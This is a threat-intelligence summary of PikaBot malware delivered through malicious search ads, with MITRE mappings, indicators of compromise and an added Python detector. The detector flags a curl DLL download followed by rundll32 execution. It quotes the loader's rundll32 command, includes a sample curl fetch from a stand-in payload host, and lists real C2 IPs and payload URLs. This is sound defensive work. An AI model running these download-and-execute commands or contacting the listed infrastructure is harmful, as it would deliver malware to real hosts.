PikaBot distributed via malicious search ads | Malwarebytes

Malvertising and search-engine-driven campaigns are increasingly used to drop PikaBot, a malware family linked to TA577, targeting businesses with decoy sites and signed installers. The operation uses layered evasion, including loader injections and VM checks, to evade detection and persist on infected hosts. Hashtags: #PikaBot #TA577 #FakeBat #QakBot #AnyDesk

Keypoints

  • PikaBot appeared in early 2023 and was distributed via malvertising, with strong ties to TA577 and prior payloads like QakBot.
  • The distribution chain often starts with an email (hijacked thread) containing a link to an external website, leading to a zip containing malicious JavaScript.
  • The JavaScript downloads the payload from an external site using curl and then executes it with rundll32 to run a DLL payload.
  • PikaBot’s core module is injected into the legitimate SearchProtocolHost.exe process, with stealthy, indirect syscalls to hide activity.
  • Malvertising infrastructure bypasses Google checks via tracking URLs and legitimate marketing platforms, with VM checks before redirecting to a decoy AnyDesk site.
  • Indicators include malicious domains, Dropbox-hosted MSI installers, PikaBot hashes, and a set of C2 IPs.

MITRE Techniques

  • [T1566.002] Phishing: Spearphishing Link – An email (hijacked thread) containing a link to an external website. Quote: ‘an email (hijacked thread) containing a link to an external website.’
  • [T1105] Ingress Tool Transfer – The JavaScript creates a random directory structure where it retrieves the malicious payload from an external website via the curl utility. Quote: ‘The JavaScript creates a random directory structure where it retrieves the malicious payload from an external website via the curl utility.’
  • [T1218.011] Signed Binary Proxy Execution: Rundll32 – The payload is executed via rundll32. Quote: ‘rundll32 C:\Gkooegsglitrg\Dkrogirbksri\Wkkfgujbsrbuj.dll,Enter’
  • [T1055] Process Injection – The core module is injected into the legitimate SearchProtocolHost.exe process. Quote: ‘PikaBot’s core module is then injected into the legitimate SearchProtocolHost.exe process.’
  • [T1497.001] Virtualization/Sandbox Evasion – JavaScript fingerprinting checks determine if the user is running a VM. Quote: ‘fingerprinting via JavaScript to determine, among other things, if the user is running a virtual machine.’
  • [T1189] Drive-by Compromise – Malvertising drives initial access by leveraging ads to deliver the payload. Quote: ‘During this past year, we have seen an increase in the use of malicious ads (malvertising) and specifically those via search engines, to drop malware targeting businesses.’
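As an added defender-side example (not code from the Malwarebytes report), the curl download and rundll32 execution steps from the key points and technique list above can be correlated over process-creation telemetry; the trusted-directory list, the event format and the sample events are assumptions constructed for this snippet.

```python
import re

# Directories DLLs are normally loaded from; anything else is "unusual". This list is an
# assumption for the example, not something taken from the Malwarebytes report.
TRUSTED_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")

# curl writing a .dll to disk (-o / --output), and rundll32 invoking <dll>,<export>.
CURL_OUT = re.compile(r'\bcurl(?:\.exe)?\b.*?(?:-o|--output)\s+"?([^\s"]+\.dll)', re.I)
RUNDLL = re.compile(r'\brundll32(?:\.exe)?\s+"?([^\s",]+\.dll)"?\s*,\s*(\w+)', re.I)


def is_unusual(path: str) -> bool:
    """True if the DLL lives outside the trusted system/program directories."""
    return not path.lower().startswith(TRUSTED_DIRS)


def detect_chain(events: list[dict]) -> list[dict]:
    """Correlate process-creation events ({"ts", "image", "cmdline"}, time-ordered).

    A curl download of a .dll into an unusual directory is remembered; a later
    rundll32 of that same path with an export (PikaBot's loader used ',Enter')
    is a high-severity alert. rundll32 of an unusual DLL with no matching
    download is still reported, at medium severity.
    """
    downloaded: dict[str, int] = {}
    alerts: list[dict] = []
    for ev in events:
        m = CURL_OUT.search(ev["cmdline"])
        if m and is_unusual(m.group(1)):
            downloaded[m.group(1).lower()] = ev["ts"]
            continue
        m = RUNDLL.search(ev["cmdline"])
        if m and is_unusual(m.group(1)):
            dll, export = m.group(1), m.group(2)
            src_ts = downloaded.get(dll.lower())
            alerts.append({"ts": ev["ts"], "dll": dll, "export": export, "download_ts": src_ts,
                           "severity": "high" if src_ts is not None else "medium"})
    return alerts


# Constructed sample events (not real telemetry); the first two mirror the chain in the
# report, with backslashes restored in the rundll32 command line it quotes.
SAMPLE = [
    {"ts": 1, "image": "curl.exe", "cmdline": r"curl.exe -o C:\Gkooegsglitrg\Dkrogirbksri\Wkkfgujbsrbuj.dll https://payload.example/stage"},
    {"ts": 2, "image": "rundll32.exe", "cmdline": r"rundll32 C:\Gkooegsglitrg\Dkrogirbksri\Wkkfgujbsrbuj.dll,Enter"},
    {"ts": 3, "image": "rundll32.exe", "cmdline": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"},
    {"ts": 4, "image": "rundll32.exe", "cmdline": r"rundll32.exe C:\Users\Public\update.dll,Run"},
]

for alert in detect_chain(SAMPLE):
    print(alert)
```

Running the block prints one high-severity alert for the curl-then-rundll32 pair and one medium alert for the unexplained rundll32 of a DLL under C:\Users\Public, while the shell32.dll load is ignored.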

Indicators of Compromise

  • [Domain] Malicious domains – anadesky.ovmv.net, cxtensones.top
  • [URL] Dropbox payloads – dropbox.com/scl/fi/3o9baztz08bdw6yts8sft/Installer.msi?dl=1&rlkey=wpbj6u5u6tja92y1t157z4cpq, dropbox.com/scl/fi/p8iup71lu1tiwsyxr909l/Installer.msi?dl=1&rlkey=h07ehkq617rxphb3asmd91xtu
  • [Hash] PikaBot hashes – 0e81a36141d196401c46f6ce293a370e8f21c5e074db5442ff2ba6f223c435f5, da81259f341b83842bf52325a22db28af0bc752e703a93f1027fa8d38d3495ff, 69281eea10f5bfcfd8bc0481f0da9e648d1bd4d519fe57da82f2a9a452d60320
  • [IP] PikaBot C2s – 172.232.186.251, 57.128.83.129, 57.128.164.11, 57.128.108.132, 139.99.222.29

Read more: https://www.malwarebytes.com/blog/threat-intelligence/2023/12/pikabot-distributed-via-malicious-ads